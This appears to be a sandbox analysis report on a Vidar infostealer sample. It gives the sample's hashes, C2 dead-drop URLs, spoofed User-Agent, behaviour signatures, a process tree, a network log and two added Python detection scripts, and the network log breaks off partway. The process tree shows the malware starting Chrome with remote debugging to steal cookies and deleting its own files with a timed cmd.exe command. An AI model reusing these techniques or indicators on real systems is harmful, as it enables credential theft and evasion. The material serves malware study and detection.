Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    2024-11-01, 04:37 UTC

General

  • Target

    9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

  • Size

    1.1MB

  • MD5

    ba7e3ccf268bc947d7434bfb46945306

  • SHA1

    e85e4ebb00bc165f7ed6345b9e80ef2c0f07d789

  • SHA256

    9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b

  • SHA512

    5de6db2cc0d57fff384c89e3bafa59a857b6a55d2e36a5b2409aa472d06c029f21c6a47203c82714addb290d92ffdd621b06009e7ba7d566a4120ed3c8e02fe0

  • SSDEEP

    24576:hkYQFXibHi3fe2Fyw8N9Zl8Ff3XXoCvaBr59Co2fI85:+YQFXGHSG2K9LKtyJyfJ5

Malware Config

Extracted

Family

vidar

C2

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
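
The two C2 entries above are a Telegram channel page and a Steam profile page, not the stealer's backend: the Network section shows the sample fetching https://t.me/asg7rd and, within two seconds, sending a GET and then a multipart/form-data POST to sixburda.sbs with the hard-coded macOS Safari User-Agent from this config. The Python below is an added example, not Triage's code and not from the report, that flags that bootstrap sequence and the OS/User-Agent mismatch in HTTP logs. The HttpEvent record layout and field names are this example's own assumption, and the sample events are constructed from the report's Network section (the g.bing.com request is not attributed to a process in the report).

```python
"""Flag a Vidar-style C2 bootstrap (dead-drop fetch, then multipart POST to a
different host) and a browser User-Agent that does not match the host OS.

Added example; the HttpEvent layout is an assumption of this script, and the
records in EVENTS are constructed from the report's Network section.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Hosts this sample's config uses as dead-drop resolvers (not the real C2).
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}

# Substrings that identify a macOS browser User-Agent.
MAC_UA_MARKERS = ("Macintosh", "Mac OS X")

SAMPLE = "9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
VIDAR_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
            "(KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6")


@dataclass
class HttpEvent:
    ts: datetime
    process: str            # image name of the process that made the request
    method: str
    url: str
    user_agent: str
    content_type: str = ""  # request Content-Type header, if any


def ua_mismatch(ev: HttpEvent, host_os: str = "windows") -> bool:
    """True when a Windows host sends a macOS browser User-Agent."""
    return host_os == "windows" and any(m in ev.user_agent for m in MAC_UA_MARKERS)


def find_c2_bootstrap(events, window=timedelta(seconds=60)):
    """Return (dead_drop_url, c2_host) for every dead-drop GET that the same
    process follows, within `window`, with a multipart POST to another host."""
    ordered = sorted(events, key=lambda e: e.ts)
    hits = []
    for i, drop in enumerate(ordered):
        if drop.method != "GET" or urlparse(drop.url).hostname not in DEAD_DROP_HOSTS:
            continue
        for later in ordered[i + 1:]:
            if later.ts - drop.ts > window:
                break
            host = urlparse(later.url).hostname
            if (later.process == drop.process
                    and later.method == "POST"
                    and host not in DEAD_DROP_HOSTS
                    and later.content_type.startswith("multipart/form-data")):
                hits.append((drop.url, host))
    return hits


# Constructed from the report's Network section; timestamps follow the HTTP
# Date headers, and the bing request carries no process attribution there.
T0 = datetime(2024, 11, 1, 4, 37, 39)
EVENTS = [
    HttpEvent(T0 - timedelta(seconds=1), "(unattributed)", "GET",
              "https://g.bing.com/neg/0", "WindowsShellClient/9.0.40929.0 (Windows)"),
    HttpEvent(T0, SAMPLE, "GET", "https://t.me/asg7rd", ""),  # no UA header sent
    HttpEvent(T0 + timedelta(seconds=1), SAMPLE, "GET", "https://sixburda.sbs/", VIDAR_UA),
    HttpEvent(T0 + timedelta(seconds=2), SAMPLE, "POST", "https://sixburda.sbs/", VIDAR_UA,
              "multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG"),
]

if __name__ == "__main__":
    for drop, c2 in find_c2_bootstrap(EVENTS):
        print(f"dead drop {drop} -> C2 host {c2}")
    for ev in EVENTS:
        if ua_mismatch(ev):
            print(f"UA/OS mismatch: {ev.process} {ev.method} {ev.url}")
```

The dead-drop check keys on the sequence rather than on the domain name, because the final host (here sixburda.sbs) changes between builds while the Telegram and Steam resolvers stay stable.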

Signatures

  • Detect Vidar Stealer 14 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and session cookies.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
    "C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
      "C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
      2⤵
      PID:4324
    • C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
      "C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb37b0cc40,0x7ffb37b0cc4c,0x7ffb37b0cc58
          4⤵
          PID:4000
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2000 /prefetch:2
          4⤵
          PID:1684
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1884,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
          4⤵
          PID:2104
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:8
          4⤵
          PID:972
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:212
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3356 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:4560
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4288,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:4952
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3596,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:8
          4⤵
          PID:2024
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
          4⤵
          PID:1376
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4564,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:8
          4⤵
          PID:676
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,14592384854548270235,10357524861248500936,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
          4⤵
          PID:4320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IEGCBAAFHDHD" & exit
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1064
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 10
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:3392
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 308
      2⤵
      • Program crash
      PID:2596
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3992 -ip 3992
    1⤵
    PID:3984
  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
    1⤵
    PID:3260
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    1⤵
    PID:3948
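
Two things in the tree above are worth turning into detections: the sample's second-stage process (PID 2756) launching chrome.exe with --remote-debugging-port=9223, which exposes the DevTools protocol and lets the stealer read credentials and session cookies out of the running browser, and the cmd.exe /c timeout /t 10 & rd /s /q ... child that deletes the stealer's working directory after a delay. The Python below is an added example, not Triage's code and not from the report, that checks process-creation records for both patterns. The ProcEvent record layout is this example's own assumption; the records are constructed from the tree above, with the parent PID of the top-level process set to 0 because the report does not show it.

```python
"""Flag two process-tree patterns from this Vidar report: a browser started
with --remote-debugging-port by a non-browser parent, and a delayed
self-cleanup via cmd.exe /c timeout ... & rd /s /q <dir>.

Added example; the ProcEvent layout is this script's own assumption and the
records in EVENTS are constructed from the report's Processes section.
"""
import re
from dataclasses import dataclass

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}

REMOTE_DEBUG = re.compile(r"--remote-debugging-port=(\d+)")
# timeout /t N ... & rd /s /q "<dir>"  (the quotes around <dir> are optional)
DELAYED_RD = re.compile(r'timeout\s+/t\s+\d+.*?&\s*rd\s+/s\s+/q\s+"?([^"&]+)', re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def image_name(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_remote_debug_launch(events):
    """Return (pid, parent_image, port) for each top-level browser process
    (no --type= flag, so not a renderer/GPU/utility child, which inherits the
    flag) that has remote debugging enabled and a non-browser parent."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if image_name(e.image) not in BROWSER_IMAGES or "--type=" in e.cmdline:
            continue
        m = REMOTE_DEBUG.search(e.cmdline)
        parent = by_pid.get(e.ppid)
        if m and parent is not None and image_name(parent.image) not in BROWSER_IMAGES:
            hits.append((e.pid, image_name(parent.image), int(m.group(1))))
    return hits


def find_delayed_cleanup(events):
    """Return (pid, directory) for each cmd.exe that sleeps, then removes a tree."""
    hits = []
    for e in events:
        if image_name(e.image) != "cmd.exe":
            continue
        m = DELAYED_RD.search(e.cmdline)
        if m:
            hits.append((e.pid, m.group(1).strip()))
    return hits


# Constructed from the report's process tree (only the records the two checks
# need; ppid 0 marks a top-level process whose parent the report does not show).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    ProcEvent(3992, 0, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(2756, 3992, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(4732, 2756, CHROME,
              f'"{CHROME}" --remote-debugging-port=9223 --profile-directory="Default"'),
    ProcEvent(212, 4732, CHROME,
              f'"{CHROME}" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US'),
    ProcEvent(1064, 2756, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IEGCBAAFHDHD" & exit'),
    ProcEvent(3392, 1064, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 10"),
]

if __name__ == "__main__":
    for pid, parent, port in find_remote_debug_launch(EVENTS):
        print(f"PID {pid}: browser remote debugging on port {port}, parent {parent}")
    for pid, directory in find_delayed_cleanup(EVENTS):
        print(f"PID {pid}: delayed removal of {directory}")
```

Filtering on the absence of --type= matters: every renderer Chrome spawns here carries --remote-debugging-port=9223 as well, but those have chrome.exe as their parent and would only add noise.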

                          Network

                          • flag-us
                            DNS
                            8.8.8.8.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            8.8.8.8.in-addr.arpa
                            IN PTR
                            Response
                            8.8.8.8.in-addr.arpa
                            IN PTR
                            dnsgoogle
                          • flag-us
                            DNS
                            241.150.49.20.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            241.150.49.20.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            172.210.232.199.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            172.210.232.199.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            g.bing.com
                            Remote address:
                            8.8.8.8:53
                            Request
                            g.bing.com
                            IN A
                            Response
                            g.bing.com
                            IN CNAME
                            g-bing-com.ax-0001.ax-msedge.net
                            g-bing-com.ax-0001.ax-msedge.net
                            IN CNAME
                            ax-0001.ax-msedge.net
                            ax-0001.ax-msedge.net
                            IN A
                            150.171.27.10
                            ax-0001.ax-msedge.net
                            IN A
                            150.171.28.10
                          • flag-us
                            GET
                            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
                            host: g.bing.com
                            accept-encoding: gzip, deflate
                            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                            Response
                            HTTP/2.0 204
                            cache-control: no-cache, must-revalidate
                            pragma: no-cache
                            expires: Fri, 01 Jan 1990 00:00:00 GMT
                            set-cookie: MUID=037F336E37EC6ECD0370264436EA6F1A; domain=.bing.com; expires=Wed, 26-Nov-2025 04:37:38 GMT; path=/; SameSite=None; Secure; Priority=High;
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            access-control-allow-origin: *
                            x-cache: CONFIG_NOCACHE
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: B0BE76BF33264427932389BC52903A5A Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
                            date: Fri, 01 Nov 2024 04:37:37 GMT
                          • flag-us
                            GET
                            https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
                            host: g.bing.com
                            accept-encoding: gzip, deflate
                            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                            cookie: MUID=037F336E37EC6ECD0370264436EA6F1A
                            Response
                            HTTP/2.0 204
                            cache-control: no-cache, must-revalidate
                            pragma: no-cache
                            expires: Fri, 01 Jan 1990 00:00:00 GMT
                            set-cookie: MSPTC=BCv1TrShJmaxjKEIICKRKfIyZtaB0xxXpMAAcl21XZg; domain=.bing.com; expires=Wed, 26-Nov-2025 04:37:38 GMT; path=/; Partitioned; secure; SameSite=None
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            access-control-allow-origin: *
                            x-cache: CONFIG_NOCACHE
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: 257554E2E83A4C3C9C3ADDDADD9FF958 Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
                            date: Fri, 01 Nov 2024 04:37:38 GMT
                          • flag-us
                            GET
                            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=
                            Remote address:
                            150.171.27.10:443
                            Request
                            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
                            host: g.bing.com
                            accept-encoding: gzip, deflate
                            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                            cookie: MUID=037F336E37EC6ECD0370264436EA6F1A; MSPTC=BCv1TrShJmaxjKEIICKRKfIyZtaB0xxXpMAAcl21XZg
                            Response
                            HTTP/2.0 204
                            cache-control: no-cache, must-revalidate
                            pragma: no-cache
                            expires: Fri, 01 Jan 1990 00:00:00 GMT
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            access-control-allow-origin: *
                            x-cache: CONFIG_NOCACHE
                            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            x-msedge-ref: Ref A: F52E450020E640EA82EC9F0F1AA4D268 Ref B: LON601060107052 Ref C: 2024-11-01T04:37:38Z
                            date: Fri, 01 Nov 2024 04:37:38 GMT
                          • flag-us
                            DNS
                            136.32.126.40.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            136.32.126.40.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            95.221.229.192.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            95.221.229.192.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            10.27.171.150.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            10.27.171.150.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            55.36.223.20.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            55.36.223.20.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            t.me
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            t.me
                            IN A
                            Response
                            t.me
                            IN A
                            149.154.167.99
                          • flag-nl
                            GET
                            https://t.me/asg7rd
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            149.154.167.99:443
                            Request
                            GET /asg7rd HTTP/1.1
                            Host: t.me
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Fri, 01 Nov 2024 04:37:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 12305
                            Connection: keep-alive
                            Set-Cookie: stel_ssid=dfc207facb41ef4465_8006026072187125746; expires=Sat, 02 Nov 2024 04:37:39 GMT; path=/; samesite=None; secure; HttpOnly
                            Pragma: no-cache
                            Cache-control: no-store
                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                            Strict-Transport-Security: max-age=35768000
                          • flag-us
                            DNS
                            99.167.154.149.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            99.167.154.149.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            sixburda.sbs
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            sixburda.sbs
                            IN A
                            Response
                            sixburda.sbs
                            IN A
                            104.21.74.185
                            sixburda.sbs
                            IN A
                            172.67.205.154
                          • flag-us
                            GET
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYpo9iusVg0gVcXbtBqiaY3XAC%2F1xkdqO7WOAA0Wd2A35OsclErJEvKSvzqDRVLkRSFJ%2BHGmrdtgt%2B7zzxoLfQvOBb%2BpYVnkF%2FIKP6d8cNASb2zot%2B0dOPrcUuSaoUk%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930de88d5887a-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20659&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3287&recv_bytes=528&delivery_rate=193222&cwnd=252&unsent_bytes=0&cid=85cdd27f0cae6744&ts=501&x=0"
                          • flag-us
                            DNS
                            c.pki.goog
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            c.pki.goog
                            IN A
                            Response
                            c.pki.goog
                            IN CNAME
                            pki-goog.l.google.com
                            pki-goog.l.google.com
                            IN A
                            142.250.187.227
                          • flag-gb
                            GET
                            http://c.pki.goog/r/gsr1.crl
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            142.250.187.227:80
                            Request
                            GET /r/gsr1.crl HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: c.pki.goog
                            Response
                            HTTP/1.1 200 OK
                            Accept-Ranges: bytes
                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                            Cross-Origin-Resource-Policy: cross-origin
                            Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                            Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                            Content-Length: 1739
                            X-Content-Type-Options: nosniff
                            Server: sffe
                            X-XSS-Protection: 0
                            Date: Fri, 01 Nov 2024 04:06:05 GMT
                            Expires: Fri, 01 Nov 2024 04:56:05 GMT
                            Cache-Control: public, max-age=3000
                            Age: 1895
                            Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                            Content-Type: application/pkix-crl
                            Vary: Accept-Encoding
                          • flag-gb
                            GET
                            http://c.pki.goog/r/r4.crl
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            142.250.187.227:80
                            Request
                            GET /r/r4.crl HTTP/1.1
                            Connection: Keep-Alive
